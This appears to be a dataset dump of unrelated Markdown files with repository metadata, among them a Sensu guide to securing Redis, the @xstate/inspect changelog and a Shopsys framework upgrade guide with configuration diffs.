npm run build
```
### Run your unit tests
```
npm run test:unit
```
### Lints and fixes files
```
npm run lint
```
### Customize configuration
See [Configuration Reference](https://cli.vuejs.org/config/).
| 30.742857 | 306 | 0.739312 | eng_Latn | 0.99914 |
e040dbb0c0dbee58734ae33bca4848d981a905cc | 176 | md | Markdown | multitenant/readme.md | tinslice/crusader | 3ac34c9aa42326212a4f7719503e615101641776 | [
"MIT"
] | 1 | 2021-07-13T16:13:54.000Z | 2021-07-13T16:13:54.000Z | multitenant/readme.md | tinslice/crusader | 3ac34c9aa42326212a4f7719503e615101641776 | [
"MIT"
] | null | null | null | multitenant/readme.md | tinslice/crusader | 3ac34c9aa42326212a4f7719503e615101641776 | [
"MIT"
] | null | null | null | # crusader-multitenant
Simple way of adding multi tenancy to a java project.
Examples:
- [multi tenant spring boot application](../examples/multitenant-spring-boot-example) | 25.142857 | 86 | 0.784091 | eng_Latn | 0.895963 |
e041014f51a9f3d97359535292788fd87e73e742 | 3,078 | md | Markdown | content/sensu-core/1.1/guides/securing-redis.md | LindsayHill/sensu-docs | 25db17add1b0f99e61306dc5916e99cdce676be7 | [
"MIT"
] | null | null | null | content/sensu-core/1.1/guides/securing-redis.md | LindsayHill/sensu-docs | 25db17add1b0f99e61306dc5916e99cdce676be7 | [
"MIT"
] | null | null | null | content/sensu-core/1.1/guides/securing-redis.md | LindsayHill/sensu-docs | 25db17add1b0f99e61306dc5916e99cdce676be7 | [
"MIT"
] | null | null | null | ---
title: "Securing Redis"
description: "Strategies and best practices for securing Redis"
product: "Sensu Core"
version: "1.1"
weight: 9
next: ../securing-rabbitmq
previous: ../securing-sensu
menu:
sensu-core-1.1:
parent: guides
---
Redis is a key-value database, which describes itself as “an open source, BSD licensed, advanced key-value cache and store”. Sensu uses Redis for storing persistent data. Two Sensu services, the server and API, require access to the same instance of Redis to function.
This guide will discuss best practices to use with Redis for use with Sensu.
## Objectives
This guide will discuss the following:
* [Redis General Security Model](#redis-general-security-model)
* [Securing Redis with a Local Install](#securing-redis-with-a-local-install)
* [Securing Redis via Localhost Security](#securing-redis-localhost-security)
## Redis General Security Model{#redis-general-security-model}
Redis was designed to be accessed by trusted clients inside a closed network environment. As such it is recommended that Redis instances not be directly exposed to the internet or have access in general to untrusted clients that can directly connect to the Redis TCP port or UNIX socket.
Best practices from the [Redis Security Documentation][1] suggest blocking port level access to all hosts except trusted hosts, in our case your Sensu-Server, Sensu-API and/or Sensu-Enterprise-Server.
_NOTE: As of [Sensu 1.3.0][2], TLS is now supported, allowing you to encrypt your traffic between Sensu and Redis when being used as a Transport or Datastore._
## Securing Redis with a Local Installation of Sensu{#securing-redis-with-a-local-install}
For instances where you will be running Redis on the same host that you will be running Sensu, you can configure Redis to listen to the localhost only on the host loopback IP address.
To accomplish this you will need to edit `/etc/redis/redis.conf` with the following line:
{{< highlight shell >}}
bind 127.0.0.1
{{< /highlight >}}
After making the above change, you will need to restart the Redis service.
## Securing Redis via Localhost Security{#securing-redis-localhost-security}
### Redis Configuration
The Redis documentation recommends limiting access to the TCP port Redis uses. By default Redis uses the following ports:
* 6379 For standalone Redis instances
* 16379 For clustered Redis instances
* 26379 For Sential instances
We recommend binding to the host IP address instead of binding to all IP's on the host. This can be accomplished by configuring `bind` to the IP address in `/etc/redis/redis.conf`:
{{< highlight shell >}}
bind 192.168.50.41
{{< /highlight >}}
After making the change you will need to restart the Redis service so the changes take effect.
### Host Configuration
Once Redis is bound to the IP address you can then limit access to its specific IP/port using internal security tools such as host firewalls, networking ACL or other methods of locking down access to a specific host/port.
[1]: https://redis.io/topics/security
[2]: ../../../1.3/reference/redis | 43.971429 | 287 | 0.773554 | eng_Latn | 0.992896 |
e04107ecc50c0047e0d1606f2f60da79c584fc2f | 6,716 | md | Markdown | packages/xstate-inspect/CHANGELOG.md | eostrom/xstate | 43f4e91653c18eb6a1e729875033b6be80503882 | [
"MIT"
] | null | null | null | packages/xstate-inspect/CHANGELOG.md | eostrom/xstate | 43f4e91653c18eb6a1e729875033b6be80503882 | [
"MIT"
] | null | null | null | packages/xstate-inspect/CHANGELOG.md | eostrom/xstate | 43f4e91653c18eb6a1e729875033b6be80503882 | [
"MIT"
] | null | null | null | # @xstate/inspect
## 0.6.2
### Patch Changes
- [#2957](https://github.com/statelyai/xstate/pull/2957) [`8550ddda7`](https://github.com/statelyai/xstate/commit/8550ddda73e2ad291e19173d7fa8d13e3336fbb9) Thanks [@davidkpiano](https://github.com/davidkpiano)! - The repository links have been updated from `github.com/davidkpiano` to `github.com/statelyai`.
## 0.6.1
### Patch Changes
- [#2907](https://github.com/statelyai/xstate/pull/2907) [`3a8eb6574`](https://github.com/statelyai/xstate/commit/3a8eb6574db51c3d02c900561be87a48fd9a973c) Thanks [@rossng](https://github.com/rossng)! - Fix crash when sending circular state objects (#2373).
## 0.6.0
### Minor Changes
- [#2640](https://github.com/statelyai/xstate/pull/2640) [`c73dfd655`](https://github.com/statelyai/xstate/commit/c73dfd655525546e59f00d0be88b80ab71239427) Thanks [@davidkpiano](https://github.com/statelyai)! - A serializer can now be specified as an option for `inspect(...)` in the `.serialize` property. It should be a [replacer function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify#the_replacer_parameter):
```js
// ...
inspect({
// ...
serialize: (key, value) => {
if (value instanceof Map) {
return 'map';
}
return value;
}
});
// ...
// Will be inspected as:
// {
// type: 'EVENT_WITH_MAP',
// map: 'map'
// }
someService.send({
type: 'EVENT_WITH_MAP',
map: new Map()
});
```
* [#2894](https://github.com/statelyai/xstate/pull/2894) [`8435c5b84`](https://github.com/statelyai/xstate/commit/8435c5b841e318c5d35dfea65242246dfb4b34f8) Thanks [@Andarist](https://github.com/Andarist)! - The package has been upgraded to be compatible with `[email protected]`. The WS server created server-side has to be of a compatible version now.
## 0.5.2
### Patch Changes
- [#2827](https://github.com/statelyai/xstate/pull/2827) [`49de77085`](https://github.com/statelyai/xstate/commit/49de770856965b0acec846c1ff5c29463335aab0) Thanks [@erlendfh](https://github.com/erlendfh)! - Fixed a bug in `createWebsocketReceiver` so that it works as expected with a WebSocket connection.
## 0.5.1
### Patch Changes
- [#2728](https://github.com/statelyai/xstate/pull/2728) [`8171b3e12`](https://github.com/statelyai/xstate/commit/8171b3e127a289199bbcedb5cec839e9da0a1bb2) Thanks [@jacksteamdev](https://github.com/jacksteamdev)! - Fix server inspector to handle WebSocket messages as Buffer
## 0.5.0
### Minor Changes
- [`4f006ffc`](https://github.com/statelyai/xstate/commit/4f006ffc0d39854c77caf3c583bb0c9e058259af) [#2504](https://github.com/statelyai/xstate/pull/2504) Thanks [@Andarist](https://github.com/Andarist)! - `Inspector`'s `subscribe` callback will now get immediately called with the current state at the subscription time.
### Patch Changes
- [`e90b764e`](https://github.com/statelyai/xstate/commit/e90b764e4ead8bf11d273ee385a8c2db392251a4) [#2492](https://github.com/statelyai/xstate/pull/2492) Thanks [@Andarist](https://github.com/Andarist)! - Fixed a minor issue with sometimes sending `undefined` state to the inspector which resulted in an error being thrown in it when resolving the received state. The problem was very minor as no functionality was broken because of it.
## 0.4.1
### Patch Changes
- [`d9282107`](https://github.com/statelyai/xstate/commit/d9282107b931b867d9cd297ede71b55fe11eb74d) [#1800](https://github.com/statelyai/xstate/pull/1800) Thanks [@davidkpiano](https://github.com/statelyai)! - Fixed a bug where services were not being registered by the inspect client, affecting the ability to send events to inspected services.
## 0.4.0
### Minor Changes
- [`63ba888e`](https://github.com/statelyai/xstate/commit/63ba888e19bd2b72f9aad2c9cd36cde297e0ffe5) [#1770](https://github.com/statelyai/xstate/pull/1770) Thanks [@davidkpiano](https://github.com/statelyai)! - It is now easier for developers to create their own XState inspectors, and even inspect services offline.
A **receiver** is an actor that receives inspector events from a source, such as `"service.register"`, `"service.state"`, `"service.event"`, etc. This update includes two receivers:
- `createWindowReceiver` - listens to inspector events from a parent window (for both popup and iframe scenarios)
- 🚧 `createWebSocketReceiver` (experimental) - listens to inspector events from a WebSocket server
Here's how it works:
**Application (browser) code**
```js
import { inspect } from '@xstate/inspect';
inspect(/* options */);
// ...
interpret(someMachine, { devTools: true }).start();
```
**Inspector code**
```js
import { createWindowReceiver } from '@xstate/inspect';
const windowReceiver = createWindowReceiver(/* options? */);
windowReceiver.subscribe(event => {
// here, you will receive events like:
// { type: "service.register", machine: ..., state: ..., sessionId: ... }
console.log(event);
});
```
The events you will receive are `ParsedReceiverEvent` types:
```ts
export type ParsedReceiverEvent =
| {
type: 'service.register';
machine: StateMachine<any, any, any>;
state: State<any, any>;
id: string;
sessionId: string;
parent?: string;
source?: string;
}
| { type: 'service.stop'; sessionId: string }
| {
type: 'service.state';
state: State<any, any>;
sessionId: string;
}
| { type: 'service.event'; event: SCXML.Event<any>; sessionId: string };
```
Given these events, you can visualize the service machines and their states and events however you'd like.
## 0.3.0
### Minor Changes
- [`a473205d`](https://github.com/statelyai/xstate/commit/a473205d214563033cd250094d2344113755bd8b) [#1699](https://github.com/statelyai/xstate/pull/1699) Thanks [@davidkpiano](https://github.com/statelyai)! - The `@xstate/inspect` tool now uses [`fast-safe-stringify`](https://www.npmjs.com/package/fast-safe-stringify) for internal JSON stringification of machines, states, and events when regular `JSON.stringify()` fails (e.g., due to circular structures).
## 0.2.0
### Minor Changes
- [`1725333a`](https://github.com/statelyai/xstate/commit/1725333a6edcc5c1e178228aa869c907d3907be5) [#1599](https://github.com/statelyai/xstate/pull/1599) Thanks [@davidkpiano](https://github.com/statelyai)! - The `@xstate/inspect` package is now built with Rollup which has fixed an issue with TypeScript compiler inserting references to `this` in the top-level scope of the output modules and thus making it harder for some tools (like Rollup) to re-bundle dist files as `this` in modules (as they are always in strict mode) is `undefined`.
| 44.184211 | 542 | 0.717094 | eng_Latn | 0.742931 |
e0411935f016c5c2df35df71d26ee27ed3e23cdd | 22,521 | md | Markdown | upgrade/UPGRADE-v7.3.0.md | simara-svatopluk/shopsys | 8ae242f9d5d6fcbf852239fc4ba4d436cf659388 | [
"PostgreSQL"
] | null | null | null | upgrade/UPGRADE-v7.3.0.md | simara-svatopluk/shopsys | 8ae242f9d5d6fcbf852239fc4ba4d436cf659388 | [
"PostgreSQL"
] | null | null | null | upgrade/UPGRADE-v7.3.0.md | simara-svatopluk/shopsys | 8ae242f9d5d6fcbf852239fc4ba4d436cf659388 | [
"PostgreSQL"
] | null | null | null | # [Upgrade from v7.2.2 to v7.3.0](https://github.com/shopsys/shopsys/compare/v7.2.2...v7.3.0)
This guide contains instructions to upgrade from version v7.2.2 to v7.3.0.
**Before you start, don't forget to take a look at [general instructions](https://github.com/shopsys/shopsys/blob/7.3/UPGRADE.md) about upgrading.**
There you can find links to upgrade notes for other versions too.
## [shopsys/framework]
### Infrastructure
- update your `docker/php-fpm/Dockerfile` production stage build ([#1177](https://github.com/shopsys/shopsys/pull/1177))
```diff
RUN composer install --optimize-autoloader --no-interaction --no-progress --no-dev
-RUN php phing composer-prod npm dirs-create assets
+RUN php phing build-deploy-part-1-db-independent
```
- update Elasticsearch build configuration to allow sorting each language properly ([#1069](https://github.com/shopsys/shopsys/pull/1069))
- copy new [Dockerfile from shopsys/project-base](https://github.com/shopsys/project-base/blob/v7.3.0/docker/elasticsearch/Dockerfile) into new `docker/elasticsearch` folder
- update docker compose files (`docker-compose.yml`, `docker-compose.yml.dist`, `docker-compose-mac.yml.dist` and `docker-compose-win.yml.dist`)
```diff
elasticsearch:
- image: docker.elastic.co/elasticsearch/elasticsearch-oss:6.3.2
+ build:
+ context: .
+ dockerfile: docker/elasticsearch/Dockerfile
container_name: shopsys-framework-elasticsearch
```
- for natively installed Elasticsearch (for example in production) you have to [install ICU analysis plugin](https://www.elastic.co/guide/en/elasticsearch/plugins/current/analysis-icu.html) manually
- if you deploy to the google cloud, copy new [`.ci/deploy-to-google-cloud.sh`](https://github.com/shopsys/project-base/blob/v7.3.0/.ci/deploy-to-google-cloud.sh) script from `shopsys/project-base` ([#1126](https://github.com/shopsys/shopsys/pull/1126))
### Configuration
- for `symfony/monolog-bundle` in version `>=3.4.0` you have to unset the incompatible `excluded_404s` configuration from monolog handlers that don't use the `fingers_crossed` type ([#1154](https://github.com/shopsys/shopsys/pull/1154))
- for lower versions of the library it's still recommended to do so
- in `app/config/packages/dev/monolog.yml`:
```diff
monolog:
handlers:
main:
# change "fingers_crossed" handler to "group" that works as a passthrough to "nested"
type: group
members: [ nested ]
+ excluded_404s: false
```
- in `app/config/packages/test/monolog.yml`:
```diff
monolog:
handlers:
main:
type: "null"
+ excluded_404s: false
```
- change `name.keyword` field in Elasticsearch to sort each language properly ([#1069](https://github.com/shopsys/shopsys/pull/1069))
- update field `name.keyword` to type `icu_collation_keyword` in `src/Shopsys/ShopBundle/Resources/definition/product/*.json` and set its `language` parameter according to what locale does your domain have:
- example for English domain from [`1.json` of shopsys/project-base](https://github.com/shopsys/project-base/blob/v7.3.0/src/Shopsys/ShopBundle/Resources/definition/product/1.json) repository.
```diff
"name": {
"type": "text",
"analyzer": "stemming",
"fields": {
"keyword": {
- "type": "keyword"
+ "type": "icu_collation_keyword",
+ "language": "en",
+ "index": false
}
}
}
```
- change `TestFlag` and `TestFlagBrand` tests in `FilterQueryTest.php` to assert IDs correctly:
```diff
# TestFlag()
- $this->assertIdWithFilter($filter, [1, 5, 50, 16, 33, 39, 70, 40, 45]);
+ $this->assertIdWithFilter($filter, [1, 5, 50, 16, 33, 70, 39, 40, 45]);
# TestFlagBrand()
- $this->assertIdWithFilter($filter, [19, 17]);
+ $this->assertIdWithFilter($filter, [17, 19]);
```
- don't forget to recreate structure and export products to Elasticsearch afterwards with `php phing product-search-recreate-structure product-search-export-products`
- extend DI configuration for your project by updating ([#1049](https://github.com/shopsys/shopsys/pull/1049))
- `src/Shopsys/ShopBundle/Resources/config/services.yml`
```diff
- Shopsys\ShopBundle\Model\:
- resource: '../../Model/**/*{Facade,Factory,Repository}.php'
+ Shopsys\ShopBundle\:
+ resource: '../../**/*{Calculation,Facade,Factory,Generator,Handler,InlineEdit,Listener,Loader,Mapper,Parser,Provider,Recalculator,Registry,Repository,Resolver,Service,Scheduler,Subscriber,Transformer}.php'
+ exclude: '../../{Command,Controller,DependencyInjection,Form,Migrations,Resources,Twig}'
```
- remove the useless route `front_category_panel` from your `routing_front.yml` ([#1042](https://github.com/shopsys/shopsys/pull/1042))
- you'll find the configuration file in `src/Shopsys/ShopBundle/Resources/config/`
### Tools
- use the `build.xml` [Phing configuration](../docs/introduction/console-commands-for-application-management-phing-targets.md) from the `shopsys/framework` package ([#1068](https://github.com/shopsys/shopsys/pull/1068))
- assuming your `build.xml` and `build-dev.xml` are the same as in `shopsys/project-base` in `v7.2.2`, just remove `build-dev.xml` and replace `build.xml` with this file:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<project name="Shopsys Framework" default="list">
<property file="${project.basedir}/build/build.local.properties"/>
<property name="path.root" value="${project.basedir}"/>
<property name="path.vendor" value="${path.root}/vendor"/>
<property name="path.framework" value="${path.vendor}/shopsys/framework"/>
<property name="is-multidomain" value="true"/>
<property name="phpstan.level" value="0"/>
<import file="${path.framework}/build.xml"/>
</project>
```
- if there are any changes in the your phing configuration, you'll need to make some customizations
- read about [customization of phing targets and properties](../docs/introduction/console-commands-for-application-management-phing-targets.md#customization-of-phing-targets-and-properties) in the docs
- if you have some own additional target definitions, copy them into your `build.xml`
- if you have modified any targets, overwrite them in your `build.xml`
- examine the target in the `shopsys/framework` package (either on [GitHub](https://github.com/shopsys/shopsys/blob/7.3/packages/framework/build.xml) or locally in `vendor/shopsys/framework/build.xml`)
- it's possible that the current target's definition suits your needs now after the upgrade - you don't have to overwrite it if that's the case
- for future upgradability of your project, it's better to use the original target via `shopsys_framework.TARGET_NAME` if that's possible (eg. if you want to execute a command before or after the original task)
- if you think we can support your use case better via [phing target extensibility](../docs/contributing/guidelines-for-phing-targets.md#extensibility), please [open an issue](https://github.com/shopsys/shopsys/issues/new) or [create a pull request](/docs/contributing/guidelines-for-pull-request.md)
- if you have deleted any targets, overwrite them in your `build.xml` with a fail task so it doesn't get executed by mistake:
```xml
<target name="deleted-target" hidden="true">
<fail message="Target 'deleted-target' is disabled on this project."/>
</target>
```
- if you modified the locales for extraction in `dump-translations`, you can now overwrite just a phing property `translations.dump.locales` instead of overwriting the whole target
- for example, if you want to extract locales for German and English, add `<property name="translations.dump.locales" value="de en"/>` to your `build.xml`
- some phing targets were marked as deprecated or were renamed, stop using them and use the new ones (the original targets will still work, but a warning message will be displayed):
- `dump-translations` and `dump-translations-project-base` were deprecated, use `translations-dump` instead
- `tests-static` was deprecated, use `tests-unit` instead
- `test-db-check-schema` was deprecated, it is run automatically after DB migrations are executed
- `build-demo-ci-diff` and `checks-ci-diff` were deprecated, use `build-demo-ci` and `checks-ci` instead
- `composer` was deprecated, use `composer-prod` instead
- `generate-build-version` was deprecated, use `build-version-generate` instead
- `(test-)create-domains-data` was deprecated, use `(test-)domains-data-create` instead
- `(test-)create-domains-db-functions` was deprecated, use `(test-)domains-db-functions-create` instead
- `(test-)generate-friendly-urls` was deprecated, use `(test-)friendly-urls-generate` instead
- `(test-)replace-domains-urls` was deprecated, use `(test-)domains-urls-replace` instead
- `(test-)load-plugin-demo-data` was deprecated, use `(test-)plugin-demo-data-load` instead
- don't forget to update your Dockerfiles, Kubernetes manifests, scripts and other files that might reference the phing targets above
- we recommend upgrading PHPStan to level 1
- you'll find detailed instructions in separate article [Upgrade Instructions for Upgrading PHPStan to Level 1](/upgradetan-level-1.md)
- update your installation script (`scripts/install.sh`) to lower installation time by not running tests and standards checks during the build
```diff
- docker-compose exec php-fpm ./phing db-create test-db-create build-demo-dev
+ docker-compose exec php-fpm ./phing db-create test-db-create build-demo-dev-quick error-pages-generate
```
### Application
- **BC-BREAK** fix inconsistently named field `shortDescription` in Elasticsearch ([#1180](https://github.com/shopsys/shopsys/pull/1180))
- in `ProductSearchExportRepositoryTest::getExpectedStructureForRepository()` (the test will fail otherwise)
```diff
- 'shortDescription',
+ 'short_description',
```
- in other places you might have used it in your custom code
- follow instructions in [the separate article](upgrade-instructions-for-read-model-for-product-lists.md) to introduce read model for frontend product lists into your project ([#1018](https://github.com/shopsys/shopsys/pull/1018))
- we recommend to read [Introduction to Read Model](../docs/model/introduction-to-read-model.md) article
- copy a new functional test to avoid regression of issues with creating product variants in the future ([#1113](https://github.com/shopsys/shopsys/pull/1113))
- you can copy-paste the class [`ProductVariantCreationTest.php`](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Model/Product/ProductVariantCreationTest.php) into `tests/ShopBundle/Functional/Model/Product/` in your project
- prevent indexing `CustomerPassword:setNewPassword` by robots ([#1119](https://github.com/shopsys/shopsys/pull/1119))
- add a `meta_robots` Twig block to your `@ShopsysShop/Front/Content/Registration/setNewPassword.html.twig` template:
```twig
{% block meta_robots -%}
<meta name="robots" content="noindex, follow">
{% endblock %}
```
- you should prevent indexing by robots using this block on all in your project created pages that are secured by an URL hash
- use `autocomplete="new-password"` attribute for password changing inputs to prevent filling it by browser ([#1121](https://github.com/shopsys/shopsys/pull/1121))
- in `shopsys/project-base` repository this change was needed in 3 form classes (`NewPasswordFormType`, `UserFormType` and `RegistrationFormType`):
```diff
'type' => PasswordType::class,
'options' => [
- 'attr' => ['autocomplete' => 'off'],
+ 'attr' => ['autocomplete' => 'new-password'],
],
```
- update your tests to use interfaces of factories fetched from dependency injection container ([#970](https://github.com/shopsys/shopsys/pull/970/files))
- example
```diff
- /** @var \Shopsys\FrameworkBundle\Model\Cart\Item\CartItemFactory $cartItemFactory */
- $cartItemFactory = $this->getContainer()->get(CartItemFactory::class);
+ /** @var \Shopsys\FrameworkBundle\Model\Cart\Item\CartItemFactoryInterface $cartItemFactory */
+ $cartItemFactory = $this->getContainer()->get(CartItemFactoryInterface::class);
```
- you have to configure factories in `services_test.yml` the same way as it is in the application (`services.yml`), ie. alias the interface with your implementation
```diff
- Shopsys\FrameworkBundle\Model\Customer\UserDataFactory:
+ Shopsys\FrameworkBundle\Model\Customer\UserDataFactoryInterface:
alias: Shopsys\ShopBundle\Model\Customer\UserDataFactory
```
- you can see updated tests from clean project-base in the [pull request](https://github.com/shopsys/shopsys/pull/970/files)
- check your VAT calculations after it was modified in `shopsys/framework` ([#1129](https://github.com/shopsys/shopsys/pull/1129))
- we strongly recommend seeing [the description of the PR](https://github.com/shopsys/shopsys/pull/1129) to understand the scope of this change
- ẗo ensure you data is consistent, run DB migrations on your demo data and on a copy of production database
- if you modified the price calculation or you altered the prices in the database directly, the migration might fail during a check sum - in that case the DB transaction will be reverted and it'll tell what to do
- copy the functional test [OrderEditTest.php](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Model/Order/OrderEditTest.php) into `tests/ShopBundle/Functional/Model/Order/` to test editing of order items
- for the test to work, add test service definitions for `OrderItemDataFactory` and `OrderItemFactory` in your `src/Shopsys/ShopBundle/Resources/config/services_test.yml` configuration:
```diff
Shopsys\FrameworkBundle\Model\Customer\UserDataFactoryInterface: '@Shopsys\ShopBundle\Model\Customer\UserDataFactory'
+ Shopsys\FrameworkBundle\Model\Order\Item\OrderItemDataFactoryInterface: '@Shopsys\ShopBundle\Model\Order\Item\OrderItemDataFactory'
+
+ Shopsys\FrameworkBundle\Model\Order\Item\OrderItemFactoryInterface: '@Shopsys\FrameworkBundle\Model\Order\Item\OrderItemFactory'
+
Shopsys\FrameworkBundle\Model\Order\OrderDataFactoryInterface: '@Shopsys\ShopBundle\Model\Order\OrderDataFactory'
```
- stop using the deprecated method `\Shopsys\FrameworkBundle\Model\Pricing\PriceCalculation::getVatCoefficientByPercent()`, use `PriceCalculation::getVatAmountByPriceWithVat()` for VAT calculation instead
- if you want to customize the VAT calculation (eg. revert it back to the previous implementation), extend the service `@Shopsys\FrameworkBundle\Model\Pricing\PriceCalculation` and override the method `getVatAmountByPriceWithVat()`
- if you created new tests regarding the price calculation they might start failing after the upgrade - in such case, please see the new VAT calculation and change the tests expectations accordingly
- if you have overridden the `orderItems.html.twig` template, you'll need to update it to accommodate the two new columns:
```diff
<thead>
<tr>
<th>{{ 'Name'|trans }}</th>
<th>{{ 'Catalogue number'|trans }}</th>
<th class="text-right">{{ 'Unit price including VAT'|trans }}</th>
<th class="text-right">{{ 'Amount'|trans }}</th>
<th class="text-right">{{ 'Unit'|trans }}</th>
<th class="text-right">{{ 'VAT rate (%)'|trans }}</th>
+ <th class="text-center">
+ <span class="display-inline-block" style="width: 80px">
+ {{ 'Set prices manually'|trans }}
+ <i class="svg svg-info cursor-help js-tooltip"
+ data-toggle="tooltip" data-placement="bottom"
+ title="{{ 'All prices have to be handled manually if checked, otherwise the unit price without VAT and the total prices for that item will be recalculated automatically.'|trans }}"
+ ></i>
+ </span>
+ </th>
+ <th class="text-right">{{ 'Unit price excluding VAT'|trans }}</th>
<th class="text-right">{{ 'Total including VAT'|trans }}</th>
<th class="text-right">{{ 'Total excluding VAT'|trans }}</th>
<th></th>
</tr>
</thead>
```
```diff
<tfoot>
<tr>
- <td colspan="9">
+ <td colspan="11">
{# ... #}
</td>
</tr>
<tr>
- <th colspan="6">{{ 'Total'|trans }}:</th>
+ <th colspan="8">{{ 'Total'|trans }}:</th>
{# ... #}
</tr>
</tfoot>
```
- use automatic wiring of Redis clients for easier checking and cleaning ([#1161](https://github.com/shopsys/shopsys/pull/1161))
- if you have redefined the service `@Shopsys\FrameworkBundle\Component\Redis\RedisFacade` or `@Shopsys\FrameworkBundle\Command\CheckRedisCommand` in your project, or you instantiate the classes in your code:
- instead of instantiating `RedisFacade` with an array of cache clients to be cleaned by `php phing redis-clean`, pass an array of all redis clients and another array of redis clients you don't want to clean (eg. `global` and `session`)
```diff
Shopsys\FrameworkBundle\Component\Redis\RedisFacade:
arguments:
- - '@snc_redis.doctrine_metadata'
- - '@snc_redis.doctrine_query'
- - '@snc_redis.my_custom_cache'
+ $allClients: !tagged snc_redis.client
+ $persistentClients:
+ - '@snc_redis.global'
+ - '@snc_redis.session'
```
- this allows you to use `!tagged snc_redis.client` in your DIC config for the first argument, ensuring that newly created clients will be registered by the facade
- instead of instantiating `CheckRedisCommand` with an array of redis clients, pass an instance of `RedisFacade` instead
- modify the functional test `\Tests\ShopBundle\Functional\Component\Redis\RedisFacadeTest` so it creates `RedisFacade` using the two arrays and add a new test case `testNotCleaningPersistentClient`
- you can copy-paste the [`RedisFacadeTest`](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Component/Redis/RedisFacadeTest.php) from `shopsys/project-base`
- implement `createFromIdAndName(int $id, string $name): FriendlyUrlData` method in your implementations of `FriendlyUrlDataFactoryInterface` as the method will be added to the interface in `v8.0.0` version ([#948](https://github.com/shopsys/shopsys/pull/948))
- you can take a look at the [default implementation](https://github.com/shopsys/shopsys/pull/948/files#diff-3bf55feed4b73ffb418e24c623673188R37) and inspire yourself
- use aliases of index and build version in index name in Elasticsearch for better usage when deploying ([#1133](https://github.com/shopsys/shopsys/pull/1133))
- method `ElasticsearchStructureManager::getIndexName` is deprecated, use one of the following instead
- use `ElasticsearchStructureManager::getAliasName` if you need to access the index for read operations (eg. searching, filtering)
- use `ElasticsearchStructureManager::getCurrentIndexName` if need to write to the index or manipulate it (eg. product export)
- run `php phing product-search-recreate-structure` to generate new indexes with aliases
- use method `ElasticsearchStructureManager::deleteCurrentIndex` instead of `ElasticsearchStructureManager::deleteIndex` as it was deprecated
- if you have extended `ElasticsearchStructureManager` in `services.yml` you'll need to send the `build-version` parameter to the 4th argument of the constructor or call `setBuildVersion` setter injector like this:
```diff
Shopsys\FrameworkBundle\Component\Elasticsearch\ElasticsearchStructureManager:
arguments:
- '%shopsys.elasticsearch.structure_dir%'
- '%env(ELASTIC_SEARCH_INDEX_PREFIX)%'
+ calls:
+ - method: setBuildVersion
+ arguments:
+ - '%build-version%'
```
- copy a new functional test [`ElasticsearchStructureUpdateCheckerTest`](https://github.com/shopsys/project-base/blob/v7.3.0/tests/ShopBundle/Functional/Component/Elasticsearch/ElasticsearchStructureUpdateCheckerTest.php) into `tests/ShopBundle/Functional/Component/Elasticsearch/` in your project
- this test will ensure that the check whether to update Elasticsearch structure works as intended
- fix typo in `OrderDataFixture::getRandomCountryFromFirstDomain()`
```diff
- $randomPaymentReferenceName = $this->faker->randomElement([
+ $randomCountryReferenceName = $this->faker->randomElement([
```
[shopsys/framework]: https://github.com/shopsys/framework
| 74.820598 | 312 | 0.666755 | eng_Latn | 0.839841 |
e041976c91ec055f317ff419bbc395b1f3806794 | 859 | md | Markdown | README.md | terencebeauj/Trading_bot_BollingBands | 839fc5eac8595094a3cf9dcfb53664f281dbf225 | [
"MIT"
] | 2 | 2021-07-08T19:09:44.000Z | 2021-12-28T04:04:18.000Z | README.md | terencebeauj/Trading_bot_BollingBands | 839fc5eac8595094a3cf9dcfb53664f281dbf225 | [
"MIT"
] | null | null | null | README.md | terencebeauj/Trading_bot_BollingBands | 839fc5eac8595094a3cf9dcfb53664f281dbf225 | [
"MIT"
] | 2 | 2021-07-08T19:09:50.000Z | 2021-12-27T12:13:07.000Z | # Trading_bot_BollingerBands
A MQL5 trading bot that uses the Bollinger Bands indicator to takes trades based on the volatility of a single currency.
You can use this Expert Advisor as an example and try to improve it to develop more advanced bot (ex with money management) with the powerful MQL5 language.
You can optimize the input parameters using the Genetic Algorithm of the MT5 platform (or write your own optimization algorithm with the language using GA, particle swarm, bayesian optimization, etc...).
But be really carefull of Overfitting : try to not optimize to much parameters and always perform an Out-Of-Sample optimization.


| 95.444444 | 203 | 0.813737 | eng_Latn | 0.98263 |
e0419cac2cd12837d39d6ded02cacfc9e2e23657 | 902 | md | Markdown | Portfolio/Paintings.md | pdr-github/pdr-github.github.io | b39bd16b6b2cfa34d03b76cac981471b625f672e | [
"MIT"
] | null | null | null | Portfolio/Paintings.md | pdr-github/pdr-github.github.io | b39bd16b6b2cfa34d03b76cac981471b625f672e | [
"MIT"
] | null | null | null | Portfolio/Paintings.md | pdr-github/pdr-github.github.io | b39bd16b6b2cfa34d03b76cac981471b625f672e | [
"MIT"
] | null | null | null | ---
layout: default
title: Paintings & Illustrations
---
<div class="artpost" align="center">
<h1 class="artpost-title">[Art Portfolio]</h1>
<a href="/Portfolio/MoonGallery"><button class="button">Moon Gallery Project</button></a>
<a href="/Portfolio/Paintings"><button class="button" style="background-color: black; color: white">Paintings & Illustrations</button></a>
<a href="/Portfolio/GraphicDes"><button class="button">Graphic Design</button></a>
<a href="/Portfolio/Origami"><button class="button">Origami</button></a>
<hr>
<h1>{{ page.title }}</h1>
<br>
</div>
<div>
{% include Portfolio/Paintings/images_thumb.md%}
<!-- The Modal -->
<div id="myModal" class="modal">
<span class="close cursor" onclick="closeModal()">×</span>
<div class="modal-content">
{% include Portfolio/Paintings/images_modal.md%}
</div>
</div>
{% include Scripts/modal.md %}
</div>
| 32.214286 | 139 | 0.676275 | eng_Latn | 0.319086 |
e041d52a22996c8e4bdea08db1de5af02067533f | 10,996 | md | Markdown | README.md | MallettJamesG/AIND-Planning | 390909a804b2a7061ab7d9794acaec97daee7dd9 | [
"MIT"
] | null | null | null | README.md | MallettJamesG/AIND-Planning | 390909a804b2a7061ab7d9794acaec97daee7dd9 | [
"MIT"
] | null | null | null | README.md | MallettJamesG/AIND-Planning | 390909a804b2a7061ab7d9794acaec97daee7dd9 | [
"MIT"
] | null | null | null |
# Implement a Planning Search
## Synopsis
This project includes skeletons for the classes and functions needed to solve deterministic logistics planning problems for an Air Cargo transport system using a planning search agent.
With progression search algorithms like those in the navigation problem from lecture, optimal plans for each
problem will be computed. Unlike the navigation problem, there is no simple distance heuristic to aid the agent.
